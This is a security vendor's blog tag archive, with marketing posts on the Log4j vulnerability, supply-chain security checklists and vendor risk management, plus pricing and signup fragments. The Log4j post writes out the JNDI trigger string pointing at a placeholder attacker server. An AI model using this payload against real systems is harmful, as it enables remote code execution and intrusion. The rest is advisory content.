Tag Archives: thirdpartyrisk

What is Log4j vulnerability? Do you need to worry?

Findings VDP | log4j mitigation

Log4j vulnerability,  CVE-2021-44228, became public on December 9, 2021.

This easily triggered log4j vulnerability can be used to gain RCE (remote code execution) in vulnerable systems when the Apache Log4j utility is used. Other Apache products are vulnerable as well, such as Apache Solr.

 

Log4j is easily triggered just by log a special string {jndi:ldap://<attacker’s server>/a}; it impacts Apache Log4j version 2.0-beta9 to 2.15.0-rc, and is common in enterprise software and cloud servers across industry. Unless fixed, it enables easy access to internal networks that can end up with valuable data theft, malware implementation, crucial information deletion, and more.

 

This vulnerability is so critical, that it received the rare 10 out of 10 CVSS scores.

 

Fortunately, not everyone is affected, and mitigation can be easily applied, but first, it is recommended to check if you have been exposed to log4j easily, using Findings’ log4j free VDaaS tool.

 

For more information, feel free to visit our log4j information page

A Complete Checklist To Supply Chain Security

A complete checklist for supply chain security | Findings - Supply Chain Security Automation

Cybersecurity compliance frameworks and standards are a great starting point for managing supply chain security risks. But if your security strategy hinges solely on frameworks, you’re doing it wrong.

As The Cybersecurity Place puts it, “compliance alone won’t save you” from modern security risks.

Indeed, while embracing a cybersecurity framework is an important — and, for many organizations, necessary — first step toward securing the supply chain, businesses shoot themselves in the foot if they stop with framework adoption alone. No matter which framework you use internally, or which frameworks you require your vendors to comply with, the framework on its own is of limited value. You must also implement processes that actually operationalize the framework, allowing you to enforce compliance among your vendors.

Let’s take a look at what goes into a complete supply chain security strategy. As we’ll see, it starts with cybersecurity frameworks like NIST and ENISA, but it extends far beyond those frameworks alone.

The core components of a cybersecurity framework: The NIST example

Cybersecurity frameworks are an excellent foundation that helps businesses define overarching supply chain security principles.

For example, the NIST framework, which is popular among U.S. companies (European companies tend to use ENISA, which is similar to NIST), defines rules designed to help businesses achieve four key goals:

  • Identify: NIST requires processes that allow organizations to identify and understand their cybersecurity risks.
  • Protect: After risks have been identified, NIST requires businesses to take steps to mitigate them in order to improve their cybersecurity posture.
  • Detect: As not all risks can be identified and mitigated, NIST also requires ongoing efforts to detect active threats.
  • Respond: When active threats have been detected, NIST requires responses that can contain and eliminate them.

By adopting a framework like NIST or ENISA, then, businesses gain a high-level architecture that helps them plan a cybersecurity strategy.

Processing tools for supply chain security

The main limitation of frameworks alone is that they provide little if any specific guidance on how to turn high-level cybersecurity principles into practice. As a result, businesses also need to implement security processing tools that allow them to operationalize cybersecurity practices in ways that align with framework requirements.

Processing tools do this in the context of supply chain security by providing:

  • Vulnerability assessment: Processing tools identify risks within the products and services that third-party vendors supply to a business.
  • Coverage assessment: Processing tools help identify situations where vendors lack effective cybersecurity coverage.
  • Visibility assessment: Processing tools enable businesses to profile their vendors and suppliers in order to understand which risks exist within their systems — and which risks could, by extension, flow down the supply chain.
  • Business alignment: With processing tools, businesses can determine which risks in the supply chain pose the greatest threats to their operations. This context is essential because not all vendors and risks are of equal importance within a supply chain.

By providing this functionality in an automated way, processing tools go far in closing the gap between principle and practice. Indeed, as the SANS Institute says, automation is the only way to enforce security compliance mandates in complicated contexts like supply chains.

Managing contractual requirements

What do you do when processing tools reveal that vendors are not fully adhering to your cybersecurity requirements?

That’s where contracts and evidence come into play. Companies must maintain documents and signatures related to the security frameworks they adopt within their supply chains, then use them to enforce compliance when violations occur. Contracts also play an important role in determining which disclosures are required in the event of a supply chain breach.

Remember to update your contracts if, for example, you adopt a newer version of a cybersecurity framework or change your supply chain in a way that imposes new compliance requirements or verifications.

Most large organizations manage contractual requirements through a dedicated security team or CISO. At smaller organizations, a procurement team or IT team typically handles this responsibility. Your specific approach to vendor contract management is not as important as ensuring there is a systematic process in place for defining and enforcing contractual security agreements across your supply chain.

Supply chain security management: Responding to a crisis

The final key step in managing supply chain risks is having a plan in place to respond to incidents when they occur. You don’t want to wait for a breach to decide what to disclose, or how to contain the threat and so on.

Your response plan should define the following points:

  • Who will perform which tasks in response to an incident. Remember that many incidents require responses not just from technical stakeholders, but from other departments such as the legal, PR and others.
  • Which vendors you will use as a backup in the event that one key vendor is breached.
  • How the response will be documented.
  • How you will determine whether public disclosure of a breach is required, and how you will manage that disclosure.

In addition to developing a response plan, run drills so that your team can practice responding to a supply chain breach, before a real-life incident occurs. You should also strive to keep your team focused on the big picture. As you can’t predict the exact nature of a breach, it’s best to learn how to think holistically and creatively about managing incidents, rather than investing in rote reaction plans that may be too specific to apply to a given incident.

Last but not least, ensure that you have a response plan that will allow you to react quickly and effectively when a major security incident occurs within your supply chain. Your goal should be to resolve the incident in a way that protects your operations, customers and reputation, while also demonstrating to partners that supply chain security is a key priority.

How Your Competitors Are Preventing Supply Chain Attacks

How Your Competitors Are Preventing Supply Chain Attacks | Findings.co

Supply chain security threats are like the flu: Sooner or later, they’re bound to impact you, no matter how hard you try to avoid them.

Indeed, by their very nature, supply chain attacks are more likely to affect large numbers of organizations than most other types of breaches. The majority of cyber threats target individual companies. But a single supply chain attack could impact hundreds or thousands of businesses at once if it compromises software or data within their supply chains.

For proof of just how pervasive supply chain security risks are, you need only look at recent examples. The SolarWinds breach impacted dozens of organizations, including major U.S. federal agencies. The Kaseya breach extended to thousands of businesses spread throughout the world that use Kaseya’s software. Expect more figures like these as the prevalence of supply chain attacks — a threat that one major security research report called “staggeringly high” —continues to grow at rates approaching 400 percent.

That’s the bad news. The good news is that, as explained below, there are effective steps you can take to protect your business from supply chain risks. They won’t completely guarantee immunity from attack, but they’ll go a long way toward mitigating the threat.

Why supply chains are so risky?

The first step in managing supply chain threats is understanding what makes supply chains inherently risky.


The reasons are simple enough: Supply chains typically involve many suppliers, and it’s difficult to maintain visibility into the security state of each of them.


By comparison, it’s relatively easy to secure your own IT assets — meaning those you deploy and manage yourself. But it’s much harder to ensure that your vendors’ and suppliers’ IT environments are secure — especially when you have dozens or hundreds of vendors in your supply chain.

Managing supply chain security: The typical response

The typical playbook for managing supply chain risks includes some basic steps:

  • Compliance: Requiring suppliers to adhere to cybersecurity standards like the U.S. government’s NIST framework or the E.U.’s ENISA/ISO can help to reduce the prevalence of threats. But actually enforcing compliance across third-party vendors’ businesses can be difficult.
  • Vetting: Businesses often enforce vetting processes for new vendors. That’s good, but it doesn’t guarantee that you’ll avoid risks once a vendor relationship has already been established.
  • Cybersecurity teams: Investing in cybersecurity expertise can help harden IT assets against attack. But your own cybersecurity experts can’t do much to protect the assets of your vendors.

These are all useful strategies for managing supply chain risks. But they’re not enough on their own to make your security posture as strong as possible.

Going further to secure the supply chain

Beyond those basic supply chain security steps, businesses should implement additional measures to make their supply chains as safe as possible.

Access control

Businesses should implement tight access controls to govern who can access their systems. Access should be defined in a granular way and restricted by the principle of least privilege.

In many countries, regulations ensure that supply chain cyber security is legally required. Companies must comply with a security framework and checklist. Once this checklist is completed the vendor can prove increased controls are in place.  While strong access controls won’t prevent risks in your supply chain, they will mitigate the chances that a vendor’s cybersecurity problem becomes your cybersecurity problem.

Technology investment

Given the complexity and scale of modern supply chains, managing their security manually is not feasible in most cases. That’s why it’s wise to invest in tools that are purpose-built to assess and manage supply chain risks automatically, across all vendors’ IT estates.

Maximum visibility and coverage

Along similar lines, businesses should leverage automation technology to maximize their ability to identify and track security risks within their supply chains. This is also a process that you can’t handle manually unless you have a very simple supply chain.

Vendor Education

In addition to asking your vendors to be secure, consider providing educational resources that explain exactly how they should secure their assets. These resources could be based on cybersecurity standards that you want to enforce across your supply chain. Your vendor’s transparency should a breach occur could provide valuable feedback to others in that supply chain.

Assess vendor risk

Not all vendors pose the same level of risk. Risks vary depending on which types of data and applications the vendors supply or integrate with, and how important the vendors are to your business.

This means you should contextualize vendor risk and enforce security safeguards accordingly. High-risk vendors may require stronger oversight than those whose assets play a less central role in your operations.

Cybersecurity drills

Planning how to respond to a supply chain breach, then practicing the response via cybersecurity drills, goes a long way toward helping ensure a fast and effective resolution when attacks occur. In particular, your response plan and drills should address:

  • Business risks: It should be easy to identify which parts of the business are impacted by a breach and what level of risk their disruption poses to the overall business.
  • Manual vs. automated processes: Which response processes can be automated, and which will need to be performed manually? You’ll want to answer these questions before the breach occurs.
  • Mediation: Which teams or stakeholders will take the lead in managing a supply chain breach? If your organization does not have a CISO in place, then another person from either procurement or the I.T.  department could be appointed. Immediate decision-making in a crisis is critical.
  • Disclosure: How will you announce a breach to your customers and partners? How much information should you include about the breach? Different types of breaches and vendors may require different disclosures.

Response drills prepare you to remove risky components from your supply chain rapidly with minimal disruption to business operations.

Supply chain assessment

The most secure business is one that continuously assesses its supply chain to identify its weakest links from a security perspective. Again, not all vendors pose the same level of risk, and not all vendors can be assessed in the same way. You must implement an assessment process tailored to your particular supply chain.

As CIO Review explains, “While threats cannot be completely eliminated, supply chain security can contribute to a more secure, efficient flow of goods that can recover quickly from disruptions.”

In other words, the fact that supply chain security is impossible to guarantee completely is not an excuse for ignoring it. It’s absolutely critical to take not only basic steps for defending your supply chain, but also implementing advanced measures — such as practicing responses and automating supply chain visibility as much as possible — that can bring your risks as close as possible to zero.

Start Now For Free

 

Considerations For Evaluating Vendor Risk Management Solutions

The Vendor Risk Management (VRM) space has quickly become a hot topic this year.  It seems like everywhere you turn, new companies offering VRM solutions are popping up.  As we’ve seen with other markets in security, most vendors in the space use the same marketing buzzwords.  Each vendor seems to claim that it provides all of the same features and capabilities as the next vendor.  It can be quite difficult to make sense of the various players and what differentiates one from the next

It’s not difficult to see why Vendor Risk Management is an important function. The risk that third parties introduce into an organization needs to be understood and managed as an integral part of any strategic, holistic approach to risk management. Most organizations understand that point and are looking to address this critical business need in the near future.  So with all the confusion around the players in the VRM space, how can organizations make sense of the space and understand how to evaluate and differentiate between the different offerings?

1. One size does not fit all:
While there is significant overlap of controls across various different regulations, standards, and industries, the overlap is far from complete. Enterprises look at a variety of different concerns dependent on industry, company size, geography, type of data handled, type of electronic access to the enterprise, and many other parameters when evaluating the risk that third parties introduce.  Some of the concerns that enterprises have in the semiconductor industry will be different from those that enterprises in the financial sector have.  As will the concerns be different in the energy sector, healthcare, government, and other sectors.  If you’re looking at a VRM option that offers only a one-size-fits-all assessment with no ability to import your own custom assessment that addresses exactly the concerns that you are looking to evaluate, that should be a red flag.

2. Scans are insufficient:
Can scanning a vendor’s perimeter from the outside provide useful insight as to a portion of their overall security posture?  Absolutely.  But it is woefully inefficient in and of itself.  Scans tell us nothing about the people, process, and policy of the vendor.  They tell us nothing about what life is like on the “inside” day in and day out.  They offer nothing around how the vendor does or does not protect sensitive information.  And those are all important parts of what truly defines how effective a vendor’s security program is at managing and mitigating risk.

3. Metrics:
It should come as no surprise that in the spreadsheet, phone call, and interview-driven VRM world, metrics were very hard to come by.  Perhaps we could collect data on a few vendors and make individual assessments around their security postures.  But comparing between vendors?  Forget about it.  Tracking issues/gaps identified and working toward their resolution in a timely manner? No way.  Managing a well-documented, organized communication with the vendor from inside a centralized management platform?  Nope. Understanding the progress of each vendor and across various different groups and sets of vendors year over year?  Never happened.  An overall risk snapshot with the ability to slice and dice different reports across a series of parameters?  Not with the old way of doing things.  Looking at a VRM vendor that doesn’t provide you with all of these capabilities?  Move on.

4. Benchmarks:
Knowing the risk that a vendor or vendors introduce into our enterprise is great. But what about knowing how our risk or the risk of the vendors in our portfolio compares to others in our geography, industry, company size, or other parameters?  In my experience, this is an extremely important part of any VRM solution.  If your VRM provider doesn’t offer benchmarking, that should signal to you that it is time to move on.

5. Process is king:

Automated VRM automates and replace the spreadsheet, phone call, and interview driven world of vendor risk assessment past. Any viable VRM candidate needs to be able to provide an end-to-end automated process that can be quickly and easily managed from one centralized interface.  Anything else is simply  prehistoric in this day and age.

6. Don’t just tell me what is wrong:
Pointing out what is wrong is a start.  But suggesting how to address what is wrong and providing a seamless way to manage that process from start to finish is where the true value is in automated VRM. Advice around addressing issues/gaps and the wherewithal to see it through from start to finish is a true differentiating feature across VRM solutions.

7. Enable a decision:
In the end, enterprises need to understand their risk and use that information to make actionable decisions on what remediation is necessary.  Any serious VRM player needs to be able to facilitate, rather than fight, that process.

Findings was purpose-built to address all of these challenges to facilitate better vendor risk evaluation and management, better visibility into the supply chain, scalability and savings in cost and time.

 

Supply Chain Integrity Month

April brings us spring weather, tax filing deadlines, and also supply chain integrity month.  

 

US-CERT is helping to call attention to an important risk that all organizations face.  Per the US-CERT posting (https://www.us-cert.gov/ncas/current-activity/2019/04/01/Supply-Chain-Integrity-Month):

 

The Cybersecurity and Infrastructure Security Agency (CISA), the Office of the Director of National Intelligence (ODNI), and the Department of Defense (DOD) are partnering to promote the importance of supply chain security and risk management. Breaches in the supply chain provide an opportunity for malicious software or hardware to be installed on equipment. Lack of awareness or validation of the legitimacy of hardware and software presents a serious risk to users’ information and the overall integrity of a network environment.

 

Despite the risk that the supply chain introduces into organizations, it is all too often a problem that is approached inefficiently and ineffectively.

 

The Office of the Director of National Intelligence summarizes the problem quite well (https://www.dni.gov/index.php/ncsc-what-we-do/ncsc-supply-chain-threats):

 

These adversaries exploit supply chain vulnerabilities to steal America’s intellectual property, corrupt our software, surveil our critical infrastructure, and carry out other malicious activities. They infiltrate trusted suppliers and vendors to target equipment, systems, and information used every day by the government, businesses, and individuals.

 

Of course, the problem extends well beyond just government and critical infrastructure.  It extends into all industries and sectors. Yet, organizations can hardly be faulted for paying Vendor Risk Management (VRM) less attention than it deserves.  Historically, VRM has been an area lacking creative, efficient, and helpful technological solutions. Instead, it has been an area overwhelmed by manual, labor-intensive processes that can’t possibly assess, manage, and mitigate the risk that the supply-chain poses.

 

At IDRRA, we believe in helping organizations efficiently and effectively tackle VRM.  It’s our passion, and it’s what drives and energizes us day-to-day. Our industry-leading platform takes the pain and headache out of the VRM process, allowing organizations to focus on reducing supply-chain risk.

 

Every month should be supply-chain integrity month, and with IDRRA, it is.  There is no time like the present to make the most of supply-chain integrity month and to get your VRM program off the ground.  In fact, IDRRA (https://idrra.com/) can help you get started – register for a free account today.

Supply Chain Risk Monitoring as a Service
Join us today
Supply Chain Risk Monitoring as a Service
Join us today
Waitlist signup

Welcome to Findings

Let's go over some details to setup your tailor-made account


Please fill your details below and click "Next" to create your account:

Payment

Feature
Startup
Business
Enterprise
Price
$10 / Month
$10 / Month
$25 / Month
VDPaaS
Alerts
Assessments
Integrated Apps
API
Join today and scan ALL YOUR VENDORS for FREE*
* FREE VENDOR SCAN for all of your vendors during your first month.
Feature
Startup
Business
Enterprise
Price
$25 / Month
$200 / Month*
Contact Us
Free vendors scan for 1 month
Findings search engine
Rapid security and compliance profile
Profile/showcase engagements per year
5
40
Unlimited
Multi/unlimited showcase use cases
Showcase compliance badge for your website
Best practice self-assessment
1 Findings or 1 BYOC
Assessment response automation
Personalizable, branded security & compliance showcase page
File/evidence repository
OKTA
DKIM
Out-of-the-box TPRM
20 vendors +
20 rating scans
50 vendors +
50 rating scans
Support
Email
Priority via Phone / Email
Internal Workflows (SO/BO)
Onboarding and customization account setup
*Price for every 40 engagements
Automate assessment response and showcase your cybersecurity posture
Supply Chain Risk Monitoring as a Service
Join us today
.
.
.
.

Thank you for signing up!

Supply Chain Risk Monitoring as a Service
Join us today
.
.
.
.

Thank you for signing up!